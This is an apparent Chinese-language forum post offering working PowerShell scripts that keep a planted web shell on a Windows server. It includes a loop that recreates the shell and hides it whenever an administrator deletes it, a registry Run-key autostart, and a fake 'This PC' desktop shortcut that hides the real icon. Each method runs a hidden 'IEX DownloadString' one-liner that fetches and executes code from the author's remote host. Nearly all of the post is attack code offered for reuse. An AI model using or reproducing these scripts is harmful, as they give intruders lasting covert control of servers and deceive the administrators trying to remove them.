已经获取到了一个web shell,假定web shell的路径为G:\xampp\htdocs\backdoor\shell.php,读者自行测试时只需要修改ps1文件中这个路径即可。
利用power shell来搞一搞事情,powershell具有“不落地”即可执行的便捷之处。
主要实现思路:首先ps1脚本先获取web shell的文件内容,然后这个脚本一直在进程中静默检测设定的web shell文件是否存在,如果脚本检测到web shell被删除,则创建一个新的web shell文件,内容为脚本运行时获取的内容,并继续静默检测管理员是否又一次将web shell删除。
翠花,上代码:
$shell_path = "G:\xampp\htdocs\backdoor\shell.php"
$shell_content = [System.IO.File]::ReadAllBytes($shell_path)
while($true){
$flag = Test-Path $shell_path
if($flag -eq "True"){ sleep 1 }
else{
[System.IO.File]::WriteAllBytes($shell_path, $shell_content)
$shell = Get-Item $shell_path
$shell.Attributes = "Readonly","system","notcontentindexed","hidden","archive"
sleep 1
}
}这个system,Administrator,User都看不到文件,也删不掉文件的路子还是比较猥琐的吧,by the way,这里不需要administrator权限,即可实现此功能!
笔者将其保存到vps里 https://ub3r.cn/tools/backd00r/Backd00r-webshell.ps1 然后用“不落地执行”的路子去搞
翠花,上命令:powershell.exe -nop -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://ub3r.cn/tools/backd00r/Backd00r-webshell.ps1');Backd00r-webshell.ps1"
webshell下测试可以执行该命令
如果服务器重启,或者管理员结束可疑进程怎么办?不妨添加一个开机启动项试试!废话不多说,先上功能代码:
翠花,上代码:
$autorunKeyName = "Windows Powershell"
$autorunKeyVal = "powershell.exe -nop -windowstyle hidden -exec bypass -c ""IEX (New-Object Net.WebClient).DownloadString('https://ub3r.cn/tools/backd00r/Backd00r-webshell.ps1');Backd00r-webshell.ps1"""
$autoruns = Get-ItemProperty HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
if (-not $autoruns.$autorunKeyName) {
New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}
elseif($autoruns.$autorunKeyName -ne $autorunKeyVal) {
Remove-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName
New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name $autorunKeyName -Value $autorunKeyVal
}这段代码可以将$autorunKeyVal的值写进注册表里,开机就自动执行那条命令。
为了方便起见,可以将猥琐0x02和猥琐0x01结合起来,直接把猥琐0x01中的代码加上自启动的功能,其实就是把本段代码段添加到猥琐0x01的最前面即可,就不让翠花上代码了,直接上链接,大家可以自行下载测试:https://ub3r.cn/tools/backd00r/Backd00r-webshell-Auto.ps1
翠花,上命令:powershell.exe -nop -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://ub3r.cn/tools/backd00r/Backd00r-webshell-Auto.ps1 ');Backd00r-webshell-Auto.ps1 "
先看一个GIF,看我是如何优(wei)雅(suo)搞(kou)事(jiao)的:
完了……为了给大家看高清无码的GIF,文件大小超出限制了,那请大家移步我个人博客里的地址看这个GIF吧!
翠花,上GIF:
我就不信管理员点“此电脑”还会有顾虑!这样仿佛就像在我们自家吃饭的碗的内壁上,涂了一层十香软筋散,233333,上代码了!
翠花,上代码:
Function LNK_backdoor{
$Command = "powershell.exe -nop -windowstyle hidden -exec bypass -c ""IEX (New-Object Net.WebClient).DownloadString('https://ub3r.cn/tools/backd00r/Backd00r-webshell-Auto.ps1 ');Backd00r-webshell-Auto.ps1 """
##HIDE Computer Icon
$ErrorActionPreference = "SilentlyContinue"
If ($Error) {$Error.Clear()}
$RegistryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
If (Test-Path $RegistryPath) {
$Res = Get-ItemProperty -Path $RegistryPath -Name "HideIcons"
If (-Not($Res)) {
New-ItemProperty -Path $RegistryPath -Name "HideIcons" -Value "0" -PropertyType DWORD -Force | Out-Null
}
$Check = (Get-ItemProperty -Path $RegistryPath -Name "HideIcons").HideIcons
If ($Check -NE 0) {
New-ItemProperty -Path $RegistryPath -Name "HideIcons" -Value "0" -PropertyType DWORD -Force | Out-Null
}
}
$RegistryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons"
If (-Not(Test-Path $RegistryPath)) {
New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer" -Name "HideDesktopIcons" -Force | Out-Null
New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons" -Name "NewStartPanel" -Force | Out-Null
}
$RegistryPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel"
If (-Not(Test-Path $RegistryPath)) {
New-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons" -Name "NewStartPanel" -Force | Out-Null
}
If (Test-Path $RegistryPath) {
## -- My Computer
$Res = Get-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
If (-Not($Res)) {
New-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value "1" -PropertyType DWORD -Force | Out-Null
}
$Check = (Get-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}")."{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
If ($Check -NE 1) {
New-ItemProperty -Path $RegistryPath -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value "1" -PropertyType DWORD -Force | Out-Null
}
}
If ($Error) {$Error.Clear()}
##SHOW Computer Icon
#set-ItemProperty -Path 'HKCU:Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu' -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value 0
#set-ItemProperty -Path 'HKCU:Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel' -Name "{20D04FE0-3AEA-1069-A2D8-08002B30309D}" -Value 0
#RUNDLL32.EXE USER32.DLL,UpdatePerUserSystemParameters ,1 ,True
$Commandline = "/c explorer.exe /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D} | "
$Command = $Commandline + $Command
$get_path=New-Object -ComObject WScript.Shell;
$path = $get_path.SpecialFolders.Item('Desktop')
$WshShell = New-Object -comObject WScript.Shell
$My_Computer = 17
$Shell = new-object -comobject shell.application
$NSComputer = $Shell.Namespace($My_Computer)
$name = $NSComputer.self.name
$Shortcut = $WshShell.CreateShortcut($path+"\"+$name+".lnk")
$Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe"
$Shortcut.WindowStyle = 7
$Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,15"
$Shortcut.Arguments = ' '+ $Command
$Shortcut.Save()
refresh
}
Function refresh{
$source = @"
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
namespace FileEncryptProject.Algorithm
{
public class DesktopRefurbish
{
[DllImport("shell32.dll")]
public static extern void SHChangeNotify(HChangeNotifyEventID wEventId, HChangeNotifyFlags uFlags, IntPtr dwItem1, IntPtr dwItem2);
public static void DeskRef()
{
SHChangeNotify(HChangeNotifyEventID.SHCNE_ASSOCCHANGED, HChangeNotifyFlags.SHCNF_IDLIST, IntPtr.Zero, IntPtr.Zero);
}
}
#region public enum HChangeNotifyFlags
[Flags]
public enum HChangeNotifyFlags
{
SHCNF_DWORD = 0x0003,
SHCNF_IDLIST = 0x0000,
SHCNF_PATHA = 0x0001,
SHCNF_PATHW = 0x0005,
SHCNF_PRINTERA = 0x0002,
SHCNF_PRINTERW = 0x0006,
SHCNF_FLUSH = 0x1000,
SHCNF_FLUSHNOWAIT = 0x2000
}
#endregion//enum HChangeNotifyFlags
#region enum HChangeNotifyEventID
[Flags]
public enum HChangeNotifyEventID
{
SHCNE_ALLEVENTS = 0x7FFFFFFF,
SHCNE_ASSOCCHANGED = 0x08000000,
SHCNE_ATTRIBUTES = 0x00000800,
SHCNE_CREATE = 0x00000002,
SHCNE_DELETE = 0x00000004,
SHCNE_DRIVEADD = 0x00000100,
SHCNE_DRIVEADDGUI = 0x00010000,
SHCNE_DRIVEREMOVED = 0x00000080,
SHCNE_EXTENDED_EVENT = 0x04000000,
SHCNE_FREESPACE = 0x00040000,
SHCNE_MEDIAINSERTED = 0x00000020,
SHCNE_MEDIAREMOVED = 0x00000040,
SHCNE_MKDIR = 0x00000008,
SHCNE_NETSHARE = 0x00000200,
SHCNE_NETUNSHARE = 0x00000400,
SHCNE_RENAMEFOLDER = 0x00020000,
SHCNE_RENAMEITEM = 0x00000001,
SHCNE_RMDIR = 0x00000010,
SHCNE_SERVERDISCONNECT = 0x00004000,
SHCNE_UPDATEDIR = 0x00001000,
SHCNE_UPDATEIMAGE = 0x00008000,
}
#endregion
}
"@
Add-Type -TypeDefinition $source
[FileEncryptProject.Algorithm.DesktopRefurbish]::DeskRef()
}
LNK_backdoor$Command大家想怎么改就怎么改吧!看大家自行发挥了!
新人第一次发帖,hin是紧张!求大家不喜勿喷哦~
附上自己刚搭起来的小博客:https://ub3r.cn/
以及以上的三个ps1文件地址:
https://ub3r.cn/tools/backd00r/Backd00r-webshell.ps1 猥琐0x01
https://ub3r.cn/tools/backd00r/Backd00r-webshell-Auto.ps1 猥琐0x02
https://ub3r.cn/tools/backd00r/Lnk-Backd00r.ps1 猥琐0x03